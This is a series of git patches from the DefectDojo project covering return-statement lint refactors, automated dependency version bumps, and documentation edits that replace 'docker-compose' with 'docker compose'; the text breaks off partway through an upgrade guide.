+ day_counts = [0, 0, 0, 0, 0, 0, 0] + start_of_week = start_of_next_week + start_of_next_week += relativedelta(weeks=1) + + # finally a day that falls into the week bracket + day_counts[day_offset[created.weekday()]] = day_count + highest_day_count = max(highest_day_count, day_count) # add week in progress + empty weeks on the end if needed while tick < weeks + 1: @@ -1217,8 +1215,7 @@ def __next__(self): data = self.flo.read(self.chunk_size) if data: return data - else: - raise StopIteration + raise StopIteration def __iter__(self): return self @@ -1288,9 +1285,7 @@ def template_search_helper(fields=None, query_string=None): return findings entry_query = build_query(query_string, fields) - found_entries = findings.filter(entry_query) - - return found_entries + return findings.filter(entry_query) def get_page_items(request, items, page_size, prefix=""): @@ -1432,8 +1427,7 @@ def decrypt(key, iv, encrypted_text): encrypted_text_bytes = binascii.a2b_hex(encrypted_text) decryptor = cipher.decryptor() decrypted_text = decryptor.update(encrypted_text_bytes) + decryptor.finalize() - decrypted_text = _unpad_string(decrypted_text) - return decrypted_text + return _unpad_string(decrypted_text) def _pad_string(value): @@ -1729,9 +1723,8 @@ def get_full_url(relative_url): def get_site_url(): if settings.SITE_URL: return settings.SITE_URL - else: - logger.warning("SITE URL undefined in settings, full_url cannot be created") - return "settings.SITE_URL" + logger.warning("SITE URL undefined in settings, full_url cannot be created") + return "settings.SITE_URL" @receiver(post_save, sender=User) @@ -1797,11 +1790,10 @@ def redirect_to_return_url_or_else(request, or_else): if return_url: # logger.debug('redirecting to %s: ', return_url.strip()) return redirect(request, return_url.strip()) - elif or_else: + if or_else: return redirect(request, or_else) - else: - messages.add_message(request, messages.ERROR, "Unable to redirect anywhere.", extra_tags="alert-danger") - return redirect(request, request.get_full_path()) + messages.add_message(request, messages.ERROR, "Unable to redirect anywhere.", extra_tags="alert-danger") + return redirect(request, request.get_full_path()) def redirect(request, redirect_to): @@ -2248,6 +2240,7 @@ def get_product(obj): if isinstance(obj, Product): return obj + return None def prod_name(obj): diff --git a/ruff.toml b/ruff.toml index 5d3eecbe4d5..50f8a2baf0e 100644 --- a/ruff.toml +++ b/ruff.toml @@ -52,6 +52,7 @@ select = [ "LOG", "G001", "G002", "G1", "G2", "INP", + "RET", "SLOT", "PIE", "T20", diff --git a/tests/product_test.py b/tests/product_test.py index bc3a64c0d4c..f0bdf0172dd 100644 --- a/tests/product_test.py +++ b/tests/product_test.py @@ -25,8 +25,7 @@ def __exit__(self, *_): while time.time() < self.timeout: if self.page_has_loaded(): return True - else: - time.sleep(0.2) + time.sleep(0.2) msg = f"Timeout waiting for {self.timeout}s" raise Exception(msg) diff --git a/unittests/dojo_test_case.py b/unittests/dojo_test_case.py index 425e96f5047..f72918cf938 100644 --- a/unittests/dojo_test_case.py +++ b/unittests/dojo_test_case.py @@ -352,18 +352,15 @@ def empty_jira_project_for_product(self, product, expected_delta_jira_project_db def get_jira_issue_status(self, finding_id): finding = Finding.objects.get(id=finding_id) - updated = jira_helper.get_jira_status(finding) - return updated + return jira_helper.get_jira_status(finding) def get_jira_issue_updated(self, finding_id): finding = Finding.objects.get(id=finding_id) - updated = 
jira_helper.get_jira_updated(finding) - return updated + return jira_helper.get_jira_updated(finding) def get_jira_comments(self, finding_id): finding = Finding.objects.get(id=finding_id) - comments = jira_helper.get_jira_comments(finding) - return comments + return jira_helper.get_jira_comments(finding) def get_jira_issue_updated_map(self, test_id): findings = Test.objects.get(id=test_id).finding_set.all() @@ -710,12 +707,10 @@ def do_finding_remove_tags_api(self, http_method, finding_id, tags=None, expecte return response.data def put_finding_remove_tags_api(self, finding_id, tags, *args, **kwargs): - response = self.do_finding_remove_tags_api(self.client.put, finding_id, tags, *args, **kwargs) - return response + return self.do_finding_remove_tags_api(self.client.put, finding_id, tags, *args, **kwargs) def patch_finding_remove_tags_api(self, finding_id, tags, *args, **kwargs): - response = self.do_finding_remove_tags_api(self.client.patch, finding_id, tags, *args, **kwargs) - return response + return self.do_finding_remove_tags_api(self.client.patch, finding_id, tags, *args, **kwargs) def do_finding_notes_api(self, http_method, finding_id, note=None): data = None diff --git a/unittests/test_apply_finding_template.py b/unittests/test_apply_finding_template.py index 58c188449d8..69f641206fe 100644 --- a/unittests/test_apply_finding_template.py +++ b/unittests/test_apply_finding_template.py @@ -122,9 +122,7 @@ def make_request(self, user_is_staff, finding_id, template_id, data=None): else: request = FindingTemplateTestUtil.create_get_request(user, self.apply_template_url) - v = views.apply_template_to_finding(request, finding_id, template_id) - - return v + return views.apply_template_to_finding(request, finding_id, template_id) def test_apply_template_to_finding_with_data_does_not_display_error_success(self): result = self.make_request(user_is_staff=True, finding_id=1, template_id=1, @@ -236,9 +234,7 @@ def make_request(self, user_is_staff, finding_id, data=None): else: request = FindingTemplateTestUtil.create_get_request(user, self.choose_template_url) - v = views.find_template_to_apply(request, finding_id) - - return v + return views.find_template_to_apply(request, finding_id) def test_unauthorized_find_template_to_apply_fails(self): result = self.make_request(user_is_staff=False, finding_id=1) @@ -275,9 +271,7 @@ def make_request(self, user_is_staff, finding_id, template_id, data=None): else: request = FindingTemplateTestUtil.create_get_request(user, self.finding_template_options_url) - v = views.choose_finding_template_options(request, finding_id, template_id) - - return v + return views.choose_finding_template_options(request, finding_id, template_id) def test_unauthorized_choose_finding_template_options_fails(self): result = self.make_request(user_is_staff=False, finding_id=1, template_id=1) diff --git a/unittests/test_import_reimport.py b/unittests/test_import_reimport.py index 1015f206d7a..2d68989c180 100644 --- a/unittests/test_import_reimport.py +++ b/unittests/test_import_reimport.py @@ -1865,9 +1865,7 @@ def import_scan_with_params_ui(self, filename, scan_type="ZAP Scan", engagement= if service is not None: payload["service"] = service - result = self.import_scan_ui(engagement, payload) - - return result + return self.import_scan_ui(engagement, payload) def reimport_scan_with_params_ui(self, test_id, filename, scan_type="ZAP Scan", minimum_severity="Low", active=True, verified=False, push_to_jira=None, tags=None, close_old_findings=True, scan_date=None): # Mimic old 
functionality for active/verified to avoid breaking tests @@ -1898,8 +1896,7 @@ def reimport_scan_with_params_ui(self, test_id, filename, scan_type="ZAP Scan", if scan_date is not None: payload["scan_date"] = scan_date - result = self.reimport_scan_ui(test_id, payload) - return result + return self.reimport_scan_ui(test_id, payload) # Observations: # - When reopening a mitigated finding, almost no fields are updated such as title, description, severity, impact, references, .... diff --git a/unittests/test_rest_framework.py b/unittests/test_rest_framework.py index e4c4ef361e6..ee758ddaedb 100644 --- a/unittests/test_rest_framework.py +++ b/unittests/test_rest_framework.py @@ -265,21 +265,28 @@ def _check_helper(check): if obj is None: self._check_or_fail(is_nullable, f"{self._get_prefix()} is not nullable yet the value returned was null") - elif schema_type == TYPE_BOOLEAN: + return None + if schema_type == TYPE_BOOLEAN: _check_helper(isinstance(obj, bool)) - elif schema_type == TYPE_INTEGER: + return None + if schema_type == TYPE_INTEGER: _check_helper(isinstance(obj, int)) - elif schema_type == TYPE_NUMBER: + return None + if schema_type == TYPE_NUMBER: _check_helper(obj.isdecimal()) - elif schema_type == TYPE_ARRAY: + return None + if schema_type == TYPE_ARRAY: _check_helper(isinstance(obj, list)) - elif schema_type == TYPE_OBJECT: + return None + if schema_type == TYPE_OBJECT: _check_helper(isinstance(obj, OrderedDict) or isinstance(obj, dict)) - elif schema_type == TYPE_STRING: + return None + if schema_type == TYPE_STRING: _check_helper(isinstance(obj, str)) - else: - # Default case - _check_helper(check=False) + return None + # Default case + _check_helper(check=False) + return None # print('_check_type ok for: %s: %s' % (schema, obj)) diff --git a/unittests/tools/test_api_sonarqube_importer.py b/unittests/tools/test_api_sonarqube_importer.py index ed157ed2046..2c5564fbecf 100644 --- a/unittests/tools/test_api_sonarqube_importer.py +++ b/unittests/tools/test_api_sonarqube_importer.py @@ -10,56 +10,47 @@ def dummy_product(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/product.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_issues(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/issues.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_rule(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/rule.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_rule_wo_html_desc(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/rule_wo_html_desc.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_no_hotspot(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/no_vuln.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_one_hotspot(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/one_vuln.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_many_hotspots(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/many_vulns.json", encoding="utf-8") as 
json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_hotspot_rule(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/rule.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_hotspot_rule_wo_risk_description(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/rule_wo_risk_description.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def empty_list(self, *args, **kwargs): diff --git a/unittests/tools/test_api_sonarqube_parser.py b/unittests/tools/test_api_sonarqube_parser.py index fe4334408cd..176219291a5 100644 --- a/unittests/tools/test_api_sonarqube_parser.py +++ b/unittests/tools/test_api_sonarqube_parser.py @@ -16,26 +16,22 @@ def dummy_product(self, *args, **kwargs): with open("unittests/scans/api_sonarqube/product.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_issues(self, *args, **kwargs): with open("unittests/scans/api_sonarqube/issues.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_rule(self, *args, **kwargs): with open("unittests/scans/api_sonarqube/rule.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def dummy_hotspot_rule(self, *args, **kwargs): with open(get_unit_tests_path() + "/scans/api_sonarqube/hotspots/rule.json", encoding="utf-8") as json_file: - data = json.load(json_file) - return data + return json.load(json_file) def empty_list(self, *args, **kwargs): From ecb41074f08bde607eb0e0948d8aa8c01fdb533d Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 17 Sep 2024 10:57:21 -0500 Subject: [PATCH 34/62] Bump sqlalchemy from 2.0.34 to 2.0.35 (#10925) Bumps [sqlalchemy](https://github.com/sqlalchemy/sqlalchemy) from 2.0.34 to 2.0.35. - [Release notes](https://github.com/sqlalchemy/sqlalchemy/releases) - [Changelog](https://github.com/sqlalchemy/sqlalchemy/blob/main/CHANGES.rst) - [Commits](https://github.com/sqlalchemy/sqlalchemy/commits) --- updated-dependencies: - dependency-name: sqlalchemy dependency-type: direct:production update-type: version-update:semver-patch ... 
Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 9cc328a9f01..70cadd1972b 100644 --- a/requirements.txt +++ b/requirements.txt @@ -37,7 +37,7 @@ python-dateutil==2.9.0.post0 pytz==2024.2 redis==5.0.8 requests==2.32.3 -sqlalchemy==2.0.34 # Required by Celery broker transport +sqlalchemy==2.0.35 # Required by Celery broker transport urllib3==1.26.18 uWSGI==2.0.26 vobject==0.9.7 From cfe7cf0e6ae127b32600203e6a3a9dc09cb87069 Mon Sep 17 00:00:00 2001 From: "renovate[bot]" <29139614+renovate[bot]@users.noreply.github.com> Date: Tue, 17 Sep 2024 12:30:22 -0500 Subject: [PATCH 35/62] Update mccutchen/go-httpbin Docker tag from v2.14.1 to v2.15.0 (docker-compose.override.unit_tests_cicd.yml) (#10923) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> --- docker-compose.override.dev.yml | 2 +- docker-compose.override.unit_tests.yml | 2 +- docker-compose.override.unit_tests_cicd.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/docker-compose.override.dev.yml b/docker-compose.override.dev.yml index c2beee1ec21..581dd627900 100644 --- a/docker-compose.override.dev.yml +++ b/docker-compose.override.dev.yml @@ -54,4 +54,4 @@ services: protocol: tcp mode: host "webhook.endpoint": - image: mccutchen/go-httpbin:v2.14.1@sha256:2612f203b1be154524b0dbb65212a158776f0643e2f6e1dad45984fc93413d97 + image: mccutchen/go-httpbin:v2.15.0@sha256:24528cf5229d0b70065ac27e6c9e4d96f5452a84a3ce4433e56573c18d96827a diff --git a/docker-compose.override.unit_tests.yml b/docker-compose.override.unit_tests.yml index 7cf73e8f1f7..7c32e179386 100644 --- a/docker-compose.override.unit_tests.yml +++ b/docker-compose.override.unit_tests.yml @@ -52,7 +52,7 @@ services: image: busybox:1.36.1-musl entrypoint: ['echo', 'skipping', 'redis'] "webhook.endpoint": - image: mccutchen/go-httpbin:v2.14.1@sha256:2612f203b1be154524b0dbb65212a158776f0643e2f6e1dad45984fc93413d97 + image: mccutchen/go-httpbin:v2.15.0@sha256:24528cf5229d0b70065ac27e6c9e4d96f5452a84a3ce4433e56573c18d96827a volumes: defectdojo_postgres_unit_tests: {} defectdojo_media_unit_tests: {} diff --git a/docker-compose.override.unit_tests_cicd.yml b/docker-compose.override.unit_tests_cicd.yml index c0448794d51..64af8ac79aa 100644 --- a/docker-compose.override.unit_tests_cicd.yml +++ b/docker-compose.override.unit_tests_cicd.yml @@ -51,7 +51,7 @@ services: image: busybox:1.36.1-musl entrypoint: ['echo', 'skipping', 'redis'] "webhook.endpoint": - image: mccutchen/go-httpbin:v2.14.1@sha256:2612f203b1be154524b0dbb65212a158776f0643e2f6e1dad45984fc93413d97 + image: mccutchen/go-httpbin:v2.15.0@sha256:24528cf5229d0b70065ac27e6c9e4d96f5452a84a3ce4433e56573c18d96827a volumes: defectdojo_postgres_unit_tests: {} defectdojo_media_unit_tests: {} From 4edfdaa18d6d76d9ffd899dc5ee271d751a6636f Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 18 Sep 2024 11:57:49 -0500 Subject: [PATCH 36/62] Bump boto3 from 1.35.20 to 1.35.21 (#10929) Bumps [boto3](https://github.com/boto/boto3) from 1.35.20 to 1.35.21. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.20...1.35.21) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... 
Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 70cadd1972b..c4856bd1b24 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.20 # Required for Celery Broker AWS (SQS) support +boto3==1.35.21 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From 42704c9cf33dbd7a283c3265455090be636e7222 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 19 Sep 2024 12:48:31 -0500 Subject: [PATCH 37/62] Bump boto3 from 1.35.21 to 1.35.22 (#10935) Bumps [boto3](https://github.com/boto/boto3) from 1.35.21 to 1.35.22. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.21...1.35.22) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index c4856bd1b24..102c3e8e7cd 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.21 # Required for Celery Broker AWS (SQS) support +boto3==1.35.22 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From 83710a1c746840e0eb4357da69aaba2a2739f78c Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 20 Sep 2024 13:33:59 -0500 Subject: [PATCH 38/62] Bump ruff from 0.6.5 to 0.6.6 (#10942) Bumps [ruff](https://github.com/astral-sh/ruff) from 0.6.5 to 0.6.6. - [Release notes](https://github.com/astral-sh/ruff/releases) - [Changelog](https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md) - [Commits](https://github.com/astral-sh/ruff/compare/0.6.5...0.6.6) --- updated-dependencies: - dependency-name: ruff dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements-lint.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements-lint.txt b/requirements-lint.txt index d7a367aae58..8a66517d3b6 100644 --- a/requirements-lint.txt +++ b/requirements-lint.txt @@ -1 +1 @@ -ruff==0.6.5 \ No newline at end of file +ruff==0.6.6 \ No newline at end of file From 5ab0156b1a36bfaec695c784cb5d5826143df0b1 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 20 Sep 2024 13:55:26 -0500 Subject: [PATCH 39/62] Bump boto3 from 1.35.22 to 1.35.23 (#10941) Bumps [boto3](https://github.com/boto/boto3) from 1.35.22 to 1.35.23. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.22...1.35.23) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... 
Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 102c3e8e7cd..322272f10aa 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.22 # Required for Celery Broker AWS (SQS) support +boto3==1.35.23 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From 8dfe3730f6d13850a12a3e0b95cbaeb1d6a82cfd Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Fri, 20 Sep 2024 23:04:42 +0200 Subject: [PATCH 40/62] fix(docker compose): Use 'docker compose' everywhere (#10916) * fix(docker compose): Use 'docker compose' everywhere * Apply suggestions from code review Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --------- Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --- .github/ISSUE_TEMPLATE/bug_report.md | 2 +- .github/ISSUE_TEMPLATE/support_request.md | 2 +- docker/docker-compose-check.sh | 4 +- docker/extra_settings/README.md | 2 +- .../en/contributing/how-to-write-a-parser.md | 14 ++--- .../getting_started/running-in-production.md | 4 +- .../en/getting_started/upgrading/2.23.md | 2 +- .../en/getting_started/upgrading/2.30.md | 2 +- .../en/getting_started/upgrading/_index.md | 12 ++-- docs/content/en/integrations/jira.md | 6 +- .../en/integrations/ldap-authentication.md | 2 +- docs/content/en/usage/features.md | 10 +-- readme-docs/DOCKER.md | 62 +++---------------- tests/local-integration-tests.sh | 26 ++++---- 14 files changed, 53 insertions(+), 97 deletions(-) diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md index 713480dd33d..ba1ba50d658 100644 --- a/.github/ISSUE_TEMPLATE/bug_report.md +++ b/.github/ISSUE_TEMPLATE/bug_report.md @@ -36,7 +36,7 @@ A clear and concise description of what you expected to happen. - DefectDojo version (see footer) or commit message: [use `git show -s --format="[%ci] %h: %s [%d]"`] **Logs** -Use `docker-compose logs` (or similar, depending on your deployment method) to get the logs and add the relevant sections here showing the error occurring (if applicable). +Use `docker compose logs` (or similar, depending on your deployment method) to get the logs and add the relevant sections here showing the error occurring (if applicable). **Sample scan files** If applicable, add sample scan files to help reproduce your problem. diff --git a/.github/ISSUE_TEMPLATE/support_request.md b/.github/ISSUE_TEMPLATE/support_request.md index 7eda2a58dea..4dc3873471f 100644 --- a/.github/ISSUE_TEMPLATE/support_request.md +++ b/.github/ISSUE_TEMPLATE/support_request.md @@ -36,7 +36,7 @@ A clear and concise description of what you expected to happen. - DefectDojo version (see footer) or commit message: [use `git show -s --format="[%ci] %h: %s [%d]"`] **Logs** -Use `docker-compose logs` (or similar, depending on your deployment method) to get the logs and add the relevant sections here showing the error occurring (if applicable). +Use `docker compose logs` (or similar, depending on your deployment method) to get the logs and add the relevant sections here showing the error occurring (if applicable). 
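For illustration, one way to pull those sections out of a running deployment (a sketch only; the `uwsgi` service name and the line count are assumptions, not part of the template):

```bash
# Tail the most recent log lines of the service where the error occurs;
# swap in celeryworker, nginx, etc. depending on the failing component.
docker compose logs --tail=120 uwsgi
```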
**Sample scan files**
 If applicable, add sample scan files to help reproduce your problem.
 
diff --git a/docker/docker-compose-check.sh b/docker/docker-compose-check.sh
index b51cf45674f..d24419de2ee 100755
--- a/docker/docker-compose-check.sh
+++ b/docker/docker-compose-check.sh
@@ -6,11 +6,11 @@ current=$(docker compose version --short)
 echo 'Checking docker compose version'
 if [[ $main -lt 2 ]]; then
-    echo "$current is not a supported docker-compose version, please upgrade to the minimum supported version: 2.0"
+    echo "$current is not a supported 'docker compose' version, please upgrade to the minimum supported version: 2.0"
     exit 1
 elif [[ $main -eq 1 ]]; then
     if [[ $minor -lt 28 ]]; then
-        echo "$current is not supported docker-compose version, please upgrade to minimal supported version:1.28"
+        echo "$current is not a supported 'docker compose' version, please upgrade to the minimal supported version: 1.28"
         exit 1
     fi
 fi
diff --git a/docker/extra_settings/README.md b/docker/extra_settings/README.md
index e919e1917bc..b3a8fc0eddb 100644
--- a/docker/extra_settings/README.md
+++ b/docker/extra_settings/README.md
@@ -6,7 +6,7 @@ If a file is placed here, it will be copied on startup to `dojo/settings/local_s
 For an example, see [template-local_settings](../../dojo/settings/template-local_settings)
 
 Please note this copy action could fail if you have mounted the full `dojo/` folder, but that is owned by a different user/group.
-That's why this copy action only happens in docker-compose release mode, and not in dev/debug/unit_tests/integration_tests modes.
+That's why this copy action only happens in docker compose release mode, and not in dev/debug/unit_tests/integration_tests modes.
 
 For advanced usage you can also place a `settings.dist.py` or `settings.py` file. These will also be copied on startup to dojo/settings.
diff --git a/docs/content/en/contributing/how-to-write-a-parser.md b/docs/content/en/contributing/how-to-write-a-parser.md
index 7495f7ba886..c87846cb620 100644
--- a/docs/content/en/contributing/how-to-write-a-parser.md
+++ b/docs/content/en/contributing/how-to-write-a-parser.md
@@ -15,7 +15,7 @@ All commands assume that you're located at the root of the django-DefectDojo clo
 - Checkout `dev` and make sure you're up to date with the latest changes.
 - It's advised that you create a dedicated branch for your development, such as `git checkout -b parser-name`.
 
-It is easiest to use the docker-compose deployment as it has hot-reload capbility for uWSGI.
+It is easiest to use the docker compose deployment as it has hot-reload capability for uWSGI.
 Set up your environment to use the debug environment:
 
 `$ docker/setEnv.sh debug`
@@ -27,7 +27,7 @@ Please have a look at [DOCKER.md](https://github.com/DefectDojo/django-DefectDoj
 You will want to build your docker images locally, and eventually pass in your local user's `uid` to be able to write to the image (handy for database migration files). Assuming your user's `uid` is `1000`, then:
 
 {{< highlight bash >}}
-$ docker-compose build --build-arg uid=1000
+$ docker compose build --build-arg uid=1000
 {{< /highlight >}}
 
 ## Which files do you need to modify?
@@ -279,7 +279,7 @@ This ensures the file is closed at the end of the with statement, even if an exc
 
 ### Test database
 
-To test your unit tests locally, you first need to grant some rights.
Get your MySQL root password from the docker compose logs, login as root and issue the following commands: {{< highlight mysql >}} MYSQL> grant all privileges on test_defectdojo.* to defectdojo@'%'; @@ -291,17 +291,17 @@ MYSQL> flush privileges; This local command will launch the unit test for your new parser {{< highlight bash >}} -$ docker-compose exec uwsgi bash -c 'python manage.py test unittests.tools.. -v2' +$ docker compose exec uwsgi bash -c 'python manage.py test unittests.tools.. -v2' {{< /highlight >}} Example for the blackduck hub parser: {{< highlight bash >}} -$ docker-compose exec uwsgi bash -c 'python manage.py test unittests.tools.test_blackduck_csv_parser.TestBlackduckHubParser -v2' +$ docker compose exec uwsgi bash -c 'python manage.py test unittests.tools.test_blackduck_csv_parser.TestBlackduckHubParser -v2' {{< /highlight >}} {{% alert title="Information" color="info" %}} -If you want to run all unit tests, simply run `$ docker-compose exec uwsgi bash -c 'python manage.py test unittests -v2'` +If you want to run all unit tests, simply run `$ docker compose exec uwsgi bash -c 'python manage.py test unittests -v2'` {{% /alert %}} ### Endpoint validation @@ -330,7 +330,7 @@ In the event where you'd have to change the model, e.g. to increase a database c * Create a new migration file in dojo/db_migrations by running and including as part of your PR {{< highlight bash >}} - $ docker-compose exec uwsgi bash -c 'python manage.py makemigrations -v2' + $ docker compose exec uwsgi bash -c 'python manage.py makemigrations -v2' {{< /highlight >}} ### Accept a different type of file to upload diff --git a/docs/content/en/getting_started/running-in-production.md b/docs/content/en/getting_started/running-in-production.md index 6da16d253b7..4074acb8df0 100644 --- a/docs/content/en/getting_started/running-in-production.md +++ b/docs/content/en/getting_started/running-in-production.md @@ -5,7 +5,7 @@ draft: false weight: 4 --- -## Production use with docker-compose +## Production use with docker compose The docker-compose.yml file in this repository is fully functional to evaluate DefectDojo in your local environment. @@ -76,7 +76,7 @@ Dockerfile.django-* for in-file references. You can execute the following command to see the configuration: -`docker-compose exec celerybeat bash -c "celery -A dojo inspect stats"` +`docker compose exec celerybeat bash -c "celery -A dojo inspect stats"` and see what is in effect. 
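As a quick sketch of how to dig further, the same `celery ... inspect` interface exposes more than `stats`; the subcommands below are standard Celery CLI (not DefectDojo-specific), and the `celeryworker` service name matches the compose files in this repository:

```bash
# Worker pool statistics: concurrency, prefetch counts, task totals
docker compose exec celeryworker bash -c "celery -A dojo inspect stats"

# Which queues each worker currently consumes from
docker compose exec celeryworker bash -c "celery -A dojo inspect active_queues"
```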
#### Asynchronous Import
diff --git a/docs/content/en/getting_started/upgrading/2.23.md b/docs/content/en/getting_started/upgrading/2.23.md
index 5ebcc4edc61..5525d10ce01 100644
--- a/docs/content/en/getting_started/upgrading/2.23.md
+++ b/docs/content/en/getting_started/upgrading/2.23.md
@@ -16,6 +16,6 @@ There is a migration process built into the upgrade that will automatically conv
 - If your deployment uses the MySQL containerized database, please see the following updates to run DefectDojo:
   - Use of the helper script "dc-up": `./dc-up.sh mysql-rabbitmq` or `./dc-up.sh mysql-redis`
   - Use of the helper script "dc-up-d": `./dc-up-d.sh mysql-rabbitmq` or `./dc-up-d.sh mysql-redis`
-  - Use of Docker Compose directly: `docker-compose --profile mysql-rabbitmq --env-file ./docker/environments/mysql-rabbitmq.env up` or `docker-compose --profile mysql-redis --env-file ./docker/environments/mysql-redis.env up`
+  - Use of Docker Compose directly: `docker compose --profile mysql-rabbitmq --env-file ./docker/environments/mysql-rabbitmq.env up` or `docker compose --profile mysql-redis --env-file ./docker/environments/mysql-redis.env up`
 
 For all other changes, check the [Release Notes](https://github.com/DefectDojo/django-DefectDojo/releases/tag/2.23.0) for the contents of the release.
diff --git a/docs/content/en/getting_started/upgrading/2.30.md b/docs/content/en/getting_started/upgrading/2.30.md
index 6029febd302..b2a0bc66087 100644
--- a/docs/content/en/getting_started/upgrading/2.30.md
+++ b/docs/content/en/getting_started/upgrading/2.30.md
@@ -10,7 +10,7 @@ There are instructions for upgrading to 2.30.0 if you disabled `enable_auditlog`
 The `enable_auditlog` parameter can no longer be set through System settings. If you set this parameter, or you need to change it to `False` (to disable audit logging), set the environment variable `DD_ENABLE_AUDITLOG` to `False`.
 
-If you are using docker-compose, another EnvVar should be added to the `docker-compose.yml` file in all the containers ran by the django image. This should do the trick
+If you are using docker compose, another EnvVar should be added to the `docker-compose.yml` file in all the containers run by the django image. This should do the trick:
 ```yaml
       DD_ENABLE_AUDITLOG: ${DD_ENABLE_AUDITLOG:-False}
 ```
diff --git a/docs/content/en/getting_started/upgrading/_index.md b/docs/content/en/getting_started/upgrading/_index.md
index 9a57986deea..a7f5aa30906 100644
--- a/docs/content/en/getting_started/upgrading/_index.md
+++ b/docs/content/en/getting_started/upgrading/_index.md
@@ -5,9 +5,9 @@ draft: false
 weight: 5
 ---
 
-## Docker-compose
+## Docker compose
 
-When you deploy a vanilla docker-compose, it will create a persistent
+When you deploy a vanilla docker compose setup, it will create a persistent
 volume for your Postgres database. As long as your volume is there, you
 should not lose any data.
 
@@ -19,7 +19,7 @@ DockerHub to update.
 
 {{% /alert %}}
 
-The generic upgrade method for docker-compose are as follows:
+The generic upgrade method for docker compose is as follows:
 - Pull the latest version
 
   ``` {.sourceCode .bash}
